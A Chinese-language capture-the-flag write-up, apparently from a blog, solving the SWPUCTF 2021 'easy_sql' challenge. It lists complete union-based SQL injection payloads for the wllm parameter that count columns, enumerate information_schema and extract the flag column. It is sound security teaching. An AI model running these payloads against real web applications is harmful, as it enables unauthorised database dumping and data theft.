字符型注入([SWPUCTF 2021 新生赛]easy_sql)

拿到题目,查看源码,可知是要输入参数wllm。

输入参数/?wllm=1,得到会显

继续输入参数/?wllm=1',报错,确定为字符型漏洞

1.查看字段列表,发现在字段4报错,确定为3列

复制代码
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

2.查看回显

复制代码
?wllm=-1' union select 1,2,3--+

3.查询数据库名(test_db)

复制代码
?wllm=-1' union select 1,2,database()--+

4.查看test_db库的表(users)

复制代码
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

5.查询字段

复制代码
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

6.出现flag字段,查看flag字段的内容

复制代码
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

出现flag字段,成功解出

相关推荐
IvorySQL28 分钟前
PG 日报|查询优化器重大修复,支持更多复杂 SQL 优化
数据库·人工智能·postgresql·开源
写代码的强哥1 小时前
TiDB 和 OceanBase 对比:架构师视角下的企业选型实战指南
数据库·云原生·架构
志栋智能1 小时前
超自动化安全:提升安全服务满意度的隐形引擎
大数据·安全·自动化
BullSmall2 小时前
SonarQube 完整手册(2026 最新)
安全·开源·sonar
汉堡包0012 小时前
【工具分享】--威胁情报平台大全
学习·安全·web安全·信息安全
Sirius Wu3 小时前
OpenClaw Model Provider(模型提供商)完整详解
服务器·网络·人工智能·安全·aigc
金融小白数据分析之路3 小时前
绍兴市镇街echarts 制作
前端·数据库·echarts
介一安全3 小时前
【SRC】基础思路篇15:JWT安全测试完全指南
web安全·jwt·安全性测试·src
桐薇全肯定3 小时前
MySQL学生成绩管理系统实战操作
java·数据库·sql
虹科网络安全3 小时前
“顶会”看安全(十六):深入分析函数内联及其对基于机器学习的二进制分析的安全影响
人工智能·安全·机器学习